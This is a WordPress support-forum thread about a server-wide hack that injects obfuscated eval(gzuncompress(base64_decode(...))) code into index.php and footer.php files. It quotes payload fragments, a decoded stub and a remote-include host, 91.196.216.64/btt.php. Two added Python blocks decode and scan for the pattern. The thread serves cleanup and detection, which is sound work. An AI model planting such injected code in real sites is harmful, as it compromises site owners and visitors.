WordPress.org


Fatal error: Cannot redeclare _765258526() (55 posts)

  1. iramaura
    Member
    Posted 2 years ago #

    Hi folks,

    just yesterday noticed the following notice at the bottom on one of my subdomain websites:
    "Fatal error: Cannot redeclare _765258526() (previously declared in /home/aimaeaco/public_html/leda/wp-content/themes/Leda/footer.php(76) : eval()'d code:1) in /home/aimaeaco/public_html/leda/index.php(18) : eval()'d code on line 1"

    after this I've checked all my websites (domain & sub-domains) and each and every contains the same notice, only the directories differ.

    sub-domain where I noticed: http://leda.aimaea.com (running WP 3.2.1 and no events calendar of any sort).

    though I haven't noticed any change in the websites' functionality, it is pretty annoying to have "Fatal error" text at the very bottom of each website.

    I would appreciate Your help.

    many, many thanks in advance.

    Levee

  2. mattwhyatt
    Member
    Posted 2 years ago #

    Hi

    I too have the same problem on all my WordPress sites.
    I have the same message...

    Fatal error: Cannot redeclare _765258526() (previously declared in...

    ...at the bottom of all my sites. They are all hosted together.

    Any ideas/help much appreciated.

  3. esmi
    Forum Moderator
    Posted 2 years ago #

    @iramaura: I can't see any error on that site.

  4. ivancasasemepre
    Member
    Posted 2 years ago #

    I have the same problem :S

  5. mattwhyatt
    Member
    Posted 2 years ago #

    I've removed everything on one site I manage at http://www.sparkleandsmile.co.uk/

    It's at the bottom.

    The connection between sites I manage was a plugin called Simple "Coming soon" And "Under construction"

    As you can see at http://www.perfectlyframed.com/

    Help! What's going on?

  6. saynototheoffice
    Member
    Posted 2 years ago #

    Guys. I had this problem this morning. I think it stemmed from the fact that my site was hacked over the last couple of days which led to a malware warning on some of my pages from Google. I searched for the solution to the hack, which I fixed last night. It involved deleting some files and some malicious code inside some WP files. Anyway, I cleaned it all up last night and thought I had left it perfect.

    However, this morning I noticed the Fatal error: Cannot redeclare _765258526() error at the bottom of the screen.

    Firstly, my index.php file had some malicious code at the bottom which I hadn't seen - I deleted that but it didn't fix the problem. I looked in footer.php but couldn't see anything wrong with it. However, I restored it from a backup and it fixed the problem.

    So, it's something to do with footer.php but I don't know exactly what. If you have a backup, restore that file. If not, perhaps someone with some more knowledge could comb through and find out what's causing it.

    I also strongly recommend you to check around your site(s) and make sure they haven't been hacked. This hack affected all my sites (WordPress and otherwise) on my hosting account (Dreamhost) - in that all the index files were infected with malicious code.

  7. mattwhyatt
    Member
    Posted 2 years ago #

    Thanks @saynototheoffice I've just checked an index.php file on one of my sites and it had horrid... <?php eval(gzuncompress .... code at the bottom of it.

    I then checked other WordPress sites I manage and the same code appeared. This is the first time I've been hacked and don't know what to do, so appreciate your reply.

    I've contacted my hosting company as it looks like it all happened yesterday at 4pm as the index.php files have all been modified at that time.

    Does anyone know a solution? WordPress Gurus?
    Many thanks.

  8. saynototheoffice
    Member
    Posted 2 years ago #

    That's exactly what happened to me. Looks like you've been hit by the same hack. Are you on Dreamhost? Did you get a load of hits from a bot in Russia last week? The solution I followed was from this page:

    http://redleg-redleg.blogspot.com/2011/11/malicious-software-hosted-on-nlai.html#more

    In addition, I had to clean that horrible code out of all the index.php files of each site on my account. That solved the malware issue. Finally, I replaced the footer.php file as described above and that got rid of the warning at the bottom of the page.

    My first hack too. Hope whoever does this falls under a bus.

  9. iramaura
    Member
    Posted 2 years ago #

    hi guys!

    well, I got help from my ISP and yes, I was hacked too, mainly due to my very weak ISP profile/account password. I've strengthened it.

    the following code was embedded into some crucial files of wordpress:


    pretty long crap. I've found it in the following files:

    /home/aimaeaco/public_html/leda/wp-includes/theme-compat/footer.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/themes/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/themes/twentyeleven/footer.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/themes/duotive-three/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/themes/beback/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/themes/twentyten/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/plugins/wordpress-popular-posts/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/plugins/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/plugins/sexybookmarks/js/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/plugins/sexybookmarks/includes/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/uploads/shareaholic/spritegen/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-content/uploads/shareaholic/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy
    /home/aimaeaco/public_html/leda/wp-admin/user/index.php: Suspicious(base64_decode): ncompress(base64_decode('eF6VlMmy

    what I did was, that I removed that malicious php line from the listed files. also, I've downloaded some security plugins for my websites.

    here is a nice collection: http://www.dailytechpost.com/index.php/11-best-wordpress-security-plugins/

  10. keesiemeijer
    moderator
    Posted 2 years ago #

  11. iramaura
    Member
    Posted 2 years ago #

    hi folks!

    @keesiemeijer: thanks for the security links.

    has anybody fixed the site yet? please share the experience.

    many thanks!

  12. mattwhyatt
    Member
    Posted 2 years ago #

    I've been in touch with my hosting company who have been no help whatsoever.

    I'm going through the steps..

    I've downloaded ClamXav to scan my computer as suggested on a few other links.

    Nothing fixed yet!

  13. saynototheoffice
    Member
    Posted 2 years ago #

    @iramaura Yes - I managed to fix my site - look at my post above.

  14. iramaura
    Member
    Posted 2 years ago #

    hi again!

    @saynototheoffice: I meant the other two guys who had the same issue. as a matter of fact, I've had a russian bot attack, but I paid no attention.

    @mattwhyatt: my ISP reacted immediately, I was slow. maybe consider migrating to another.

    I'm still in learning phase, so I'll pay more attention to security - bit glad this issue occurred.

    thanks for Your assistance.

    cheers!

  15. saynototheoffice
    Member
    Posted 2 years ago #

    OK - I just spent some more time cleaning this up and used this script to detect malicious code:

    http://redleg-redleg.blogspot.com/p/simple-script-to-find-base64decode-in.html

    What I found was that this attack basically inserts the code into any file called 'index' on the hosting account - of which there are quite a few.

  16. mattwhyatt
    Member
    Posted 2 years ago #

    @saynototheoffice: That's a great link to the script detector. Many thanks. My hosting have come back and said that they are 99.9% secure and the attack happened through one of my sites. That's it. No helping but happy to take my money.

    I've got some code removing to be doing.

    Thanks everyone for their help.

  17. victorciobanu
    Member
    Posted 2 years ago #

    This attack is related to the MW:JS:DEPACK one.
    Your linux server is infected, i would recommend changing all the passwords you can (sql,root,ftp).

    I had the MW:JS:DEPACK on November 5th and wrote an article about it here: How to Remove MW:JS:DEPACK.

    On 14 Nov my server (all index.php) files were infected by this malware.
    I've written a tutorial here How to remove Cannot redeclare _765258526 , however i realize now that the issue is with the server and not the wordpress install.

    To avoid removing all the code by hand just replace (overwrite) the wordpress install files, then manually clean the theme's index.php

    CHMOD'ing the theme index.php to 444 helps, otherwise the code will be inserted again.

    I'm starting to think that these are anonymous's (the hacker group) DDOS'es at work (they are using our site's visitors), since both exploits (ms:js:deepack and redeclare_76528526) open an invisible iframe on our site, iframe that loads a certain page at a certain moment (with js:deepack it was facebook)

  18. victorciobanu
    Member
    Posted 2 years ago #

    *edit - this exploit however does not work since WordPress uses 2 index.php files ... the one the WordPress install has (root) and the theme's (wp-content/themes) index.php; and the code declares function _765258526($i){$a=Array();return base64_decode($a[$i]);} twice, since it's inserted in both files, causing it to malfunction

    so far i have decoded `$GLOBALS['_2143977049_']=Array();
    function _765258526($i){$a=Array();return base64_decode($a[$i]);}
    $GLOBALS['_226432454_']=Array();` there is another part i cannot decode yet.

    Decoding the whole thing would help us find out what was the malware script doing and putting a stop to these kind of recent hacks.

  19. keesiemeijer
    moderator
    Posted 2 years ago #

    I've been trying to decode the code given by iramaura: http://pastebin.com/i73NKHiU

    the results of that decoding are: http://pastebin.com/xAeB81uL

    It seems it wants to get code included from: 91.196.216.64/btt.php
    I also think it fails to do this. not sure though.
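
Added example, not part of the original thread or of the pastebin decodes linked above: a static unwrapper that peels nested `eval(gzuncompress(base64_decode('...')))` layers without executing anything. PHP's `gzuncompress` reads zlib-format data, so Python's `zlib` can inflate it; the sample payload, `wrap()` and `_demo` are constructed for illustration.

```python
import base64
import re
import zlib

# One PHP wrapper of the kind quoted in the thread.
WRAPPER = re.compile(
    r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(\s*"
    r"(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)\s*;?"
)
MAX_DEPTH = 10          # stop on deeply nested wrappers
MAX_OUTPUT = 1 << 20    # cap inflated size (decompression-bomb guard)


def decode_blob(b64_text):
    """base64-decode and zlib-inflate one blob; nothing is executed."""
    raw = base64.b64decode(b64_text, validate=False)
    inflater = zlib.decompressobj()
    out = inflater.decompress(raw, MAX_OUTPUT)
    if inflater.unconsumed_tail:
        raise ValueError("inflated data exceeds MAX_OUTPUT")
    return out.decode("utf-8", errors="replace")


def peel(php_source, depth=0):
    """Return [(depth, decoded_text), ...] for every wrapper, recursively."""
    layers = []
    if depth >= MAX_DEPTH:
        return layers
    for match in WRAPPER.finditer(php_source):
        try:
            text = decode_blob(match.group(2))
        except (ValueError, zlib.error) as exc:
            layers.append((depth, "<undecodable: %s>" % exc))
            continue
        layers.append((depth, text))
        layers.extend(peel(text, depth + 1))
    return layers


def wrap(php_code):
    """Build a harmless constructed sample using the same wrapper shape."""
    blob = base64.b64encode(zlib.compress(php_code.encode())).decode()
    return "eval(gzuncompress(base64_decode('%s')));" % blob


# Constructed input: a harmless function wrapped twice, then put in a footer.
INNER = "function _demo($i){$a=Array();return base64_decode($a[$i]);}"
SAMPLE = "<?php " + wrap(wrap(INNER)) + " get_footer(); ?>"

if __name__ == "__main__":
    for depth, text in peel(SAMPLE):
        print(depth, text[:70])
```

Run it against a copy of an infected file on an analysis machine, not on the web server; the decoded layers are only returned as text.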

  20. victorciobanu
    Member
    Posted 2 years ago #

    @keesiemeijer you rock ! btt.php is the key !

    logged on to my server, and looked for the file, i only found that file on infected wordpress installations. btt.php looks to be related to tehnocrati import module and it was used to put some files in the server in /wp-admin/import

    while looking for the file i noticed something strange in one of my installs in wp-admin/import/wunderbar_emporium !!! inside this folder there are some files that were not supposed to be there. they are most likely put there by the hacker !

    this is mind-blowing stuff ! i will investigate this further and post the results!

    wunderbar_emporium is the name of the linux exploit responsible for all this hassle ! contact your host providers (i run my own server) and notify them about this (check to see if the files are there first)

  21. marujobhz
    Member
    Posted 2 years ago #

    i have 2 sites affected, with a php malicious code in index and footer.php files of theme used. i removed both code and changed the password of user wp and ftp. is it sufficient, or must i do other things?
    my sites are hosted on dreamhost too.

  22. saynototheoffice
    Member
    Posted 2 years ago #

    @marujobhz In summary:

    - Delete all the themes and plugins you aren't using
    - Clean code from all footer.php and index.php. You have to look carefully as the hackers hide them with white space.
    - Run the script I linked to above to detect any other malicious code and delete
    - Change the database password. You have to do that in Dreamhost control panel and unfortunately the new password you set for the 'user' will affect all the databases you are using that user to access - if you see what I mean. Then you have to change the WP configuration file with the new DB password - for all sites on your account. Also, if you have any other non WP sites, you will have to change the configuration of them too.

    I'm not an expert, but this worked for me. Good luck. J

  23. marujobhz
    Member
    Posted 2 years ago #

    hi, i'm doing it. one question: are all files listed with "contains base64_decode" infected?? in my search, the script is listed too: ./find-string.php -> contains base64_decode

  24. marujobhz
    Member
    Posted 2 years ago #

    so i ran the find string and changed the pws, and now i have this result:
    is it normal or do i have to delete some part of code? i don't see the strange code/script in these files...
    ./find-string.php -> contains base64_decode
    ./site/wp-app.php -> contains base64_decode
    ./site/wp-content/themes/themename/scripts/timthumb.php -> contains base64_decode
    ./site/wp-content/plugins/shortcodes-ultimate/lib/timthumb.php -> contains base64_decode
    ./site/wp-content/plugins/gravityforms/form_display.php -> contains base64_decode
    ./site/wp-includes/class-IXR.php -> contains base64_decode
    ./site/wp-includes/class-simplepie.php -> contains base64_decode
    Could not check ./site/wp-includes/js/jquery.js
    thanks!

  25. saynototheoffice
    Member
    Posted 2 years ago #

    Not all the files that come up positive necessarily have malicious code. You can normally tell if the code looks dodgy - you have to use your judgment. I think the ones you have listed are OK. I had those too.
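
Added example, not part of the original thread and not the Red Leg script: a triage scanner that separates the injected pattern discussed here (decoded data passed straight to `eval`, code hidden behind white space, long base64 literals) from ordinary `base64_decode` calls such as those in `class-IXR.php`. The thresholds, verdict names and sample files are assumptions constructed for illustration.

```python
import os
import re

# eval( [any nested calls] base64_decode( ... : decoded data is executed.
EVAL_CHAIN = re.compile(r"eval\s*\(\s*(?:\w+\s*\(\s*)*base64_decode\s*\(", re.I)
# Code pushed off-screen behind a long run of spaces or tabs.
PADDING = re.compile(r"[ \t]{200,}(?=\S)")
# A quoted base64 string far longer than legitimate code usually embeds.
LONG_BLOB = re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]")


def classify(source):
    """Return (verdict, reasons) for the text of one PHP file."""
    reasons = []
    if EVAL_CHAIN.search(source):
        reasons.append("eval() of base64-decoded data")
    if PADDING.search(source):
        reasons.append("code behind a long whitespace run")
    if LONG_BLOB.search(source):
        reasons.append("long base64 string literal")
    if "eval() of base64-decoded data" in reasons:
        return "infected", reasons
    if reasons:
        return "suspicious", reasons
    if "base64_decode" in source:
        return "review", ["plain base64_decode call"]
    return "clean", []


def scan_tree(root):
    """Classify every .php file under root; return the non-clean ones."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                verdict, reasons = classify(fh.read())
            if verdict != "clean":
                hits[path] = (verdict, reasons)
    return hits


# Constructed sample files (not taken from the thread); the blob is filler.
SAMPLES = {
    "wp-includes/class-IXR.php": "<?php $v = base64_decode($this->_currentTagContents);",
    "wp-content/themes/demo/footer.php": "<?php wp_footer(); ?>" + " " * 300
    + "<?php eval(gzuncompress(base64_decode('" + "QUJD" * 60 + "'))); ?>",
    "index.php": "<?php require('./wp-blog-header.php');",
}

if __name__ == "__main__":
    for path, text in SAMPLES.items():
        print(path, *classify(text))
```

A "review" verdict still needs a human look; comparing the file against a fresh copy of the same WordPress, theme or plugin version settles it.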

  26. marujobhz
    Member
    Posted 2 years ago #

    ok, i think now it's ok. how can i warn google to retire the alert with malicious. is it possible? i installed the plugin 'secure wordpress', that uses 'website defender' to scan the website. so, it shows me these alerts:
    Malware
    SpamHaus - DNS1 - ns1.dreamhost.com.
    is it possible for dreamhost to have the virus/malware inside webserver/host?
    thanks.
    keep in touch to verify and propose solutions.
    best regards!

  27. saynototheoffice
    Member
    Posted 2 years ago #

    You have to request a review from within Webmaster tools. Can't answer the other questions, sorry.

  28. iramaura
    Member
    Posted 2 years ago #

    hi again,

    the script from Red Leg blog is a fine little tool, though it lists "healthy" files as well (but it really doesn't matter).

    how old is this kind of malware attack? have such attacks happened in the past and how often do such malicious attacks happen?

    which WP plugins may strengthen websites' security, i.e. which ones from the link I attached earlier would You recommend?

    many thanks for all Your efforts.

    cheers!

  29. keesiemeijer
    moderator
    Posted 2 years ago #

  30. lavalink
    Member
    Posted 2 years ago #

    This dumb hack hit me too. Second time I've been hacked in two months. My friend who uses Dreamhost got hit by it as well. It's unfortunate as my friends are talking about switching to Drupal because of WordPress being targeted so much and broken into so easily these days.

Topic Closed

This topic has been closed to new replies.
